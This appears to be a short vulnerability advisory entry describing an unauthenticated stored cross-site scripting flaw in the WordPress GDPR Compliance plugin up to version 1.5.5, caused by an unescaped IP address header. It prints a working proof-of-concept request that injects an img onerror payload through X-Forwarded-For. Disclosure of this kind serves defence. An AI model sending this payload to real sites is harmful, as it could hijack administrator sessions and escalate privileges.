The GDPR Compliance <= 1.5.5 plugin allowed unauthenticated users to exploit Stored Cross-Site Scripting (XSS) in the administration panel, which might lead to the privilege escalation. That was due to clients' IP Addresses reflected in the plugin's dashboard without being correctly validated or escaped.
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: 0.0.0.0:31337 X-Forwarded-For: 1.1.1.1"><img src=x onerror=alert(1)> action=wpgdprc_process_action&security=cccf5a60ec&data={"type":"access_request","email":"[email protected]","consent":true}
vavkamil
vavkamil
Yes
2021-03-01 (about 1 years ago)
2021-03-01 (about 1 years ago)
2021-03-04 (about 1 years ago)